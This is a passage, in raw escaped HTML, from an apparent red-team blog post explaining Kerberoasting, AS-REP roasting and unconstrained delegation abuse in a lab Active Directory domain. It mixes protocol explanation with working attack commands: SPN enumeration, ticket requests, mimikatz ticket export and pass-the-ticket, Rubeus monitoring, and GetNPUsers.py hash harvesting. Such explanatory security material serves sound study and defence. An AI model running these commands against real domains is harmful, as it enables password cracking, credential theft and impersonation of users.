key (user&#8217;s key in that case)<br \/>\nWe can issue a TGS ticket on our own machine, dump the ticket and start an offline bruteforce attack against it to retrieve the plaintext password for that user (service account)!<\/p>\n<p>This has been discussed already at the following <a href=\"https:\/\/blog.redforce.io\/oh-my-kerberos-do-not-get-kerberoasted\/\">blog post <\/a><\/p>\n<p>Let&#8217;s go through the process manually, I will connect to mssql service at win2012.jnkfo.lab and view the list after establishing the connection<br \/>\n<img loading=\"lazy\" 
decoding=\"async\" class=\"alignnone size-large wp-image-639\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1-1024x723.png\" alt=\"\" width=\"1024\" height=\"723\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-639\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1-1024x723.png\" alt=\"\" width=\"1024\" height=\"723\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1-1024x723.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1-300x212.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1-768x542.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k1.png 1082w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>The current user, win10user has no privs at the MSSQL DBS at all, and actually, we don&#8217;t need that as I mentioned Kerberos is all about authentication, so even low privs valid user will be able to issue a TGS for any service.<br \/>\nThat&#8217;s one way to do it, but it&#8217;s not practical, so let&#8217;s check out a better one using only native windows stuff.<br \/>\nListing the SPNs related to that machine will result in<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">C:\\Users\\win10user&gt;setspn -F -Q *\/win2012*\r\nChecking forest DC=jnkfo,DC=lab\r\nCN=WIN2012,CN=Computers,DC=jnkfo,DC=lab\r\n        WSMAN\/win2012\r\n        WSMAN\/win2012.jnkfo.lab\r\n        RestrictedKrbHost\/WIN2012\r\n        HOST\/WIN2012\r\n        RestrictedKrbHost\/win2012.jnkfo.lab\r\n        HOST\/win2012.jnkfo.lab\r\nCN=mssqlserver,CN=Users,DC=jnkfo,DC=lab\r\n        MSSQLSvc\/win2012.jnkfo.lab:1433\r\nCN=dummy1,CN=Users,DC=jnkfo,DC=lab\r\n        mssqlsvc\/win2012\r\n        xxxxx\/win2012\r\n\r\nExisting SPN found!\r\n\r\nC:\\Users\\win10user&gt;<\/pre>\n<p>As an 
attacker you will need to focus on the CN=users part, these are the crackable ones as their passwords are chooses by humans unlike the randomly generated machine keys.<br \/>\nIssue ticket for mssqlserver&#8217;s SPN using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Add-Type -AssemblyName System.IdentityModel;New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken \u2013ArgumentList \"MSSQLSvc\/win2012.jnkfo.lab:1433\"<\/pre>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-641\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3-1024x535.png\" alt=\"\" width=\"1024\" height=\"535\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-641\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3-1024x535.png\" alt=\"\" width=\"1024\" height=\"535\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3-1024x535.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3-300x157.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3-768x401.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3.png 1385w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>So dumping the current ticket using <strong>kerberos::list \/export<\/strong> will result in<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-642\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k4.png\" alt=\"\" width=\"874\" height=\"435\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-642\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k4.png\" alt=\"\" width=\"874\" 
height=\"435\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k4.png 874w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k4-300x149.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k4-768x382.png 768w\" sizes=\"auto, (max-width: 874px) 100vw, 874px\" \/><\/noscript><\/p>\n<p>knowing that the ticket is encrypted using service key, you&#8217;re ready to go and start offline cracking, for sake of illustration am using john<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-643\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-1024x205.png\" alt=\"\" width=\"1024\" height=\"205\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-643\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-1024x205.png\" alt=\"\" width=\"1024\" height=\"205\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-1024x205.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-300x60.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-768x154.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-1536x308.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5.png 1769w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Cool, again this isn&#8217;t the best approach for Kerbroasting (when it come to simplicity), invoke-kerbroast would do everything in a blink of an eye, but I just needed to show you how the process is done.<br \/>\nRefer to the following <a href=\"https:\/\/blog.redforce.io\/oh-my-kerberos-do-not-get-kerberoasted\/\">blog post<\/a> for more information and references regarding Kerbroasting.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"AS-REP_Roasting\"><\/span>AS-REP Roasting<span 
class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Before Kerberos 5, you wouldn&#8217;t see something such as KRB5KDC_ERR_PREAUTH_REQUIRED, as the preauthentication step wasn&#8217;t required.<br \/>\nThings were a little bit different.<br \/>\nIn kerberos5 this is how the 1st few steps of authentication are done<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-647\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1-1024x494.jpg\" alt=\"\" width=\"1024\" height=\"494\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-647\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1-1024x494.jpg\" alt=\"\" width=\"1024\" height=\"494\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1-1024x494.jpg 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1-300x145.jpg 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1-768x370.jpg 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1.jpg 1182w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>The preauthentication step is required, means the client is the part who&#8217;s using the user&#8217;s hash to encrypt the timestamp.<br \/>\nThis is the default option in Kerberos 5<\/p>\n<p>But in kerberos4, and also in Kerberos 5 after modifying some options, this is what&#8217;s going on.<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-648\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2-1024x494.jpg\" alt=\"\" width=\"1024\" height=\"494\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-648\" 
src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2-1024x494.jpg\" alt=\"\" width=\"1024\" height=\"494\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2-1024x494.jpg 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2-300x145.jpg 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2-768x370.jpg 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2.jpg 1182w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Once the client ask for authentication and provides username, the KDC retrieve that user&#8217;s hash and use it to encrypt a message, then send this message back to the client!!!!!<br \/>\nNow the client ca simply start an offline brute-force attack against that encrypted part.<br \/>\nThis happens in Kerberos 5 (modern AD) when the following option is enabled<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-649\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/35.png\" alt=\"\" width=\"735\" height=\"610\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-649\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/35.png\" alt=\"\" width=\"735\" height=\"610\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/35.png 735w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/35-300x249.png 300w\" sizes=\"auto, (max-width: 735px) 100vw, 735px\" \/><\/noscript><\/p>\n<p>The &#8220;Do not require Kerberos preauthentication&#8221; option isn&#8217;t enabled by default, but once it&#8217;s ticked, this is what&#8217;s happening when you login using that user<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-650\" 
src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/36.png\" alt=\"\" width=\"842\" height=\"369\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-650\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/36.png\" alt=\"\" width=\"842\" height=\"369\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/36.png 842w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/36-300x131.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/36-768x337.png 768w\" sizes=\"auto, (max-width: 842px) 100vw, 842px\" \/><\/noscript><\/p>\n<p>No preauthentication requests, the KDC just encrypted the timestamp, TGS name, TGS session key, and lifetime using user&#8217;s hash.<br \/>\nNow the attacker can simply do an offline brute-force and retrieve the user&#8217;s plaintext password.<\/p>\n<p>It&#8217;s easy to get the users with &#8220;Do not require Kerberos preauthentication&#8221; enabled using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">get-aduser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq \"True\"} | select Name\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-651\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/37.png\" alt=\"\" width=\"849\" height=\"324\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-651\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/37.png\" alt=\"\" width=\"849\" height=\"324\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/37.png 849w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/37-300x114.png 300w, 
https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/37-768x293.png 768w\" sizes=\"auto, (max-width: 849px) 100vw, 849px\" \/><\/noscript><\/p>\n<p>Attacking these users is easy using Rubeus or GetNPUsers.py.<br \/>\nGetNPUsers.py can take a wordlist of usernames and try to obtain crackable hashes for those users that have the &#8220;Do not require Kerberos preauthentication&#8221; option enabled.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">python GetNPUsers.py jnkfo.lab\/ -usersfile userslist.txt -format john -outputfile roasted.txt -no-pass -dc-ip 192.168.18.2<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-652\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38-1024x276.png\" alt=\"\" width=\"1024\" height=\"276\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-652\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38-1024x276.png\" alt=\"\" width=\"1024\" height=\"276\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38-1024x276.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38-300x81.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38-768x207.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38.png 1321w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Unconstrained_Delegation\"><\/span>Unconstrained Delegation<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Delegation is the act of a <span style=\"color: #ff0000;\">Service<\/span> impersonating a <span style=\"color: #0000ff;\">User<\/span> to access another <span style=\"color: #ff0000;\">Service<\/span>.<\/p>\n<p>Imagine a web application that is used to manage shared folders for employees.<br \/>\nThe employee logs in and can view, edit, or delete his files, which are stored on another server.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-655\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/40.png\" alt=\"\" width=\"924\" height=\"545\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-655\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/40.png\" alt=\"\" width=\"924\" height=\"545\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/40.png 924w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/40-300x177.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/40-768x453.png 768w\" sizes=\"auto, (max-width: 924px) 100vw, 924px\" \/><\/noscript><\/p>\n<p>So, Employee 1 logs in to the web server using the HTTP service ticket.<br \/>\nNow the <span style=\"color: #ff0000;\">Web application<\/span> needs to access the <span style=\"color: #ff0000;\">File sharing<\/span> server <span style=\"color: #000000;\">as <span style=\"color: #0000ff;\">Employee 1<\/span><\/span> to retrieve his files!<br \/>\nTo do so, it needs to get a TGS for the file sharing service, but with Employee 1&#8217;s username inside!<br \/>\nThat&#8217;s where delegation plays a part.<\/p>\n<p>When enabled, delegation allows employee 1 to <span style=\"color: #ff0000;\">send his own TGT<\/span> to the web server, so the web service can use it to obtain a TGS on behalf of employee 1 to access the file sharing service.<br \/>\nThe same goes for employees 2, 3, 4, etc.<\/p>\n<p>Knowing this, once you compromise a machine with the delegation option enabled<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-656\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" 
data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/42.png\" alt=\"\" width=\"478\" height=\"561\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-656\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/42.png\" alt=\"\" width=\"478\" height=\"561\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/42.png 478w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/42-256x300.png 256w\" sizes=\"auto, (max-width: 478px) 100vw, 478px\" \/><\/noscript><\/p>\n<p>You can dump the TGTs of the users who used any service on that machine, then abuse these TGTs to act on behave of these users.<br \/>\ngetting employee1&#8217;s TGT will allow you to issue a TGS for any service on behave of employee1, and so accessing the services he has access to.<\/p>\n<p>The TGT transferring part was a little bit confusing for me, many resources declared that it&#8217;s &#8220;inside&#8221; the TGS, <span style=\"color: #ff0000;\">which I found out it&#8217;s not correct at all<\/span>.<br \/>\nMany others just stating that the TGT and the TGS are being passed to the server, which isn&#8217;t enough info!!<br \/>\nso I will explain it as well, maybe someone is looking for it the same as I did.<\/p>\n<p>This is how it looks like when connecting to a machine configured for unconstrained delegation<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-664\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/47.png\" alt=\"\" width=\"1001\" height=\"274\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-664\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/47.png\" alt=\"\" width=\"1001\" height=\"274\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/47.png 1001w, 
https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/47-300x82.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/47-768x210.png 768w\" sizes=\"auto, (max-width: 1001px) 100vw, 1001px\" \/><\/noscript><\/p>\n<p>You will notice 2 TGS-REQs.<br \/>\nThe first one is for the service we&#8217;re trying to access (CIFS)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-665\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/48.png\" alt=\"\" width=\"908\" height=\"485\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-665\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/48.png\" alt=\"\" width=\"908\" height=\"485\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/48.png 908w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/48-300x160.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/48-768x410.png 768w\" sizes=\"auto, (max-width: 908px) 100vw, 908px\" \/><\/noscript><\/p>\n<p>The other one is for krbtgt<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-666\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/49.png\" alt=\"\" width=\"733\" height=\"464\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-666\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/49.png\" alt=\"\" width=\"733\" height=\"464\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/49.png 733w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/49-300x190.png 300w\" sizes=\"auto, (max-width: 733px) 100vw, 733px\" \/><\/noscript><\/p>\n<p>This is the one that the server will be able to use; it&#8217;s for getting service tickets on behalf of the user.<\/p>\n<p>The client takes the krbtgt TGS and embeds it inside the authenticator message.<br \/>\nI assume you remember how the authenticator is encrypted and decrypted.<br \/>\nIt&#8217;s encrypted using the service session key, which is found inside the TGS, which in turn can only be decrypted using the service account&#8217;s key.<br \/>\nSo the client sends the first TGS-REP, which is the service ticket,<br \/>\nand the authenticator message, which has the second TGS-REP (the TGT) inside.<br \/>\nThe service decrypts the TGS, obtains the service session key, then uses the service session key to decrypt the authenticator message and obtain the user&#8217;s TGT [KRB_CRED].<br \/>\nIt then caches it for later use.<br \/>\nThis is summarized in the following picture, which takes place after the first TGS-REP is received<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-667\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/50.png\" alt=\"\" width=\"898\" height=\"428\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-667\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/50.png\" alt=\"\" width=\"898\" height=\"428\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/50.png 898w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/50-300x143.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/50-768x366.png 768w\" sizes=\"auto, (max-width: 898px) 100vw, 898px\" \/><\/noscript><\/p>\n<p>The second TGS-REP message (TGT) is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">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<\/pre>\n<p>The authenticator message after decryption is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=5\r\n 
field-1=JNKFO.LAB\r\n field-2=Sequence:\r\n  field-0=1\r\n  field-1=SequenceOf:\r\n   win10user\r\n\r\n field-3=Sequence:\r\n  field-0=32771\r\n  field-1=0x10000000000000000000000000000000000000002300000001001a057682051630820512a003020105a103020116a282040730820403618203ff308203fba003020105a10b1b094a4e4b464f2e4c4142a21e301ca003020102a11530131b066b72627467741b094a4e4b464f2e4c4142a38203c5308203c1a003020112a103020103a28203b3048203af005344b65048b86449f7fe08544054595c6e2d5fcf532495162c1880ad69431e836b33eee70f6511d63fd424334ba4b72e9577672ed7830bd51cb33b3b33a9769b730f97c4f8cc48b6f52776814b0c50eb942bc5a44e87aaa12ee8bbe5d2cdda9aec5d2bc03ed75622ccd02c798feac7583dcf1990d5b58e9618789f01fab6cce5c1f94488162195b71cedb48101b2cf7e033ad27bd73710c803d22992d22bc946fb7166aa88c6e99a10b2846f1d19c7337c02ceb64a2ff91915176d55ec22778ce34c8fa68de349fc0aac47d36efc918f627de45996bced3ab4c888176687b66aa8777f8c293c6ab45af6adabeb92b1462d98d0f23d198cfa197e5411b936df647097bb9240953c6189e655ff668806fa0c8f1d796196386e9a2f60d503efda2d59298677ad912def4a2b13d4b825d5b6236b08bb6b8d93a59daae20b63754963121c80ca3df4ddee47541a5b47ffb4b00c7a112982d5daa89d1741100d7e57bd9b3ef6752a4fde0f2f86f64adbf7bee30a96304e1b975410f100e7d2cd7900c4e3436980b74e377fcea3bbcd5ef710fa7d81c95ef5708c686014e5b9f39b5632962bc3f187ab9b5d8a88cb89b3cb2b44673d3e8dcdecaaf0bbd93c8bd4af0ff8f58ba63fe525dfe163f4e244c575e7e8b69186571f8c0c60643ab438a8254e6051d1ffdb50d535f6543f9be9100cbfe0f5bb44ec2bc4a564fcdfc46a3555bda3032ae59b3c58f1dbeb20a8d33fd8cc05388a9c2de37b93a75d696c35bab01cb704374ebc2728a94510bab6f4c5270c27a10131a074738b26c6fc77eb43e78add1532478e5315f9509120d0e02229a803dc5388b05e6ef8f979c5fb1a2905be7471599fcffee5f37c252dd806e699b55fcb72bed8982dcbce49a129f41714e3e3971491218e447c2011fd3e24c426699858d5fa610471da03af8a6092764c4618f2868bb883dfb5979da505a31c0c129d0766eb73404200b646e396bd4b1d5c6de23898b828b578e63461708a24f426af7d43ccfec1295e783b7b1073001177a741131ca98fcc2af1f385178c5eed34a37098c8fea590ee63b0491a0b95131a39b069066c8c32250e41ded94b8d60ff
923c7e691e23f614c1ed23cc4ab4b0d53f8ac0ffb53d1b2ae37e9e1501d7bb72dbcb028d6007fb37e0142037094b43fa79a45d965aa3a053c98a3e42c037d0a5ab41487344b189c05b1b1e1dc3b8e11a482127d97b659b92382344c5ff5fbebb492146519947a140242f25c730c5130b09ea28f18eaf99b3a847c877e522c3f62d06d22ea837195bc1a470c12144af9ffb820c3266c4ef381827eb76b0c6c5a381fa3081f7a003020112a281ef0481ec6556782acbf0b4f78002c3af3a7ecf35e7a18aad30a52603763b8cf600f5eb6fc830afb3e6c61f694158b5a5209059b61a9a16f4c8dcc1191a3b188ac766c0d613af144454d0682063ceb3f4ab07b0cdee1354d37f3b6ff88fee70321c6d57ded89c6efc6f92af5cac42525730636b253d0b8a357183dbfc09d0d8ca75da7ecdaee3574c50bc31b54a2c0b3139e92d5c973cd26a8fb7581d479d74cbee5f552bb6c7a791bdf8ef575646d16af7f3134282d5edbc0272c53da2887af0dce6ba2935d237a9a26eef4df3720ffa7154970a0de4aafa16a5b8c43e33303ac0c52eb78c05d0c0f8b11546c9f672dc\r\n\r\n field-4=468\r\n field-5=20200501014535Z\r\n field-6=Sequence:\r\n  field-0=18\r\n  field-1=0x52852d5447e40ee95df24c67e8400cf79f1146df958d29d3205fe8689a55325c\r\n\r\n field-7=900366966\r\n field-8=SequenceOf:\r\n  Sequence:\r\n   field-0=1\r\n   field-1=0x3081b9303fa0040202008da137043530333031a003020100a12a0428010000000020000047a9dfdb7f739b0e5720ff9a17c3534c94c937ef0b55329c007b8ce1204dfac3301aa0040202008ea1120410a01978ab0a0200002b9d850300000000300ea0040202008fa106040400400000304aa00402020090a142044063006900660073002f00770069006e0032003000310032002e006a006e006b0066006f002e006c006100620040004a004e004b0046004f002e004c0041004200\r\n<\/pre>\n<p>You will find that the KRB_CRED is embedded inside<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">The authenticator checksum field SHALL have the following format:\r\n\r\n       Octet        Name      Description\r\n      -----------------------------------------------------------------\r\n       0..3         Lgth    Number of octets in Bnd field;  Represented\r\n                            in little-endian order;  Currently contains\r\n                            hex value 10 00 00 00 
(16).\r\n       4..19        Bnd     Channel binding information, as described in\r\n                            section 4.1.1.2.\r\n       20..23       Flags   Four-octet context-establishment flags in\r\n                            little-endian order as described in section\r\n                            4.1.1.1.\r\n       24..25       DlgOpt  The delegation option identifier (=1) in\r\n                            little-endian order [optional].  This field\r\n                            and the next two fields are present if and\r\n                            only if GSS_C_DELEG_FLAG is set as described\r\n                            in section 4.1.1.1.\r\n       26..27       Dlgth   The length of the Deleg field in\r\n                            little-endian order [optional].\r\n       28..(n-1)    Deleg   A KRB_CRED message (n = Dlgth + 28)\r\n                            [optional].\r\n       n..last      Exts    Extensions [optional].\r\n<\/pre>\n<p><a href=\"https:\/\/tools.ietf.org\/html\/rfc4121\">Reference<\/a><\/p>\n<p>So assuming I compromised the machine win2012.jnkfo.lab, I would be able to dump all the TGTs: not just those of the users who accessed the web service, but those of any user who accessed any service hosted on that machine (the web server).<br \/>\nThis can be done via mimikatz <strong>sekurlsa::tickets \/export<\/strong>.<\/p>\n<p><img class=\"alignnone size-full wp-image-657\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/43.png\" alt=\"\" width=\"679\" height=\"411\" \/><\/p>\n<p>or using <strong>.\\Rubeus.exe monitor \/interval:1<\/strong><\/p>\n<p><img class=\"alignnone size-full wp-image-658\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/44.png\" alt=\"\" width=\"711\" height=\"555\" \/><\/p>\n<p>To abuse this you can use <strong>kerberos::ptt ticket.kirbi<\/strong> on your attacking machine.<br \/>\nSo I am using this to try accessing the Windows 10 machine; this picture shows the result before and after passing the ticket.<\/p>\n<p><img class=\"alignnone size-large wp-image-659\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/45-1024x712.png\" alt=\"\" width=\"1024\" height=\"712\" 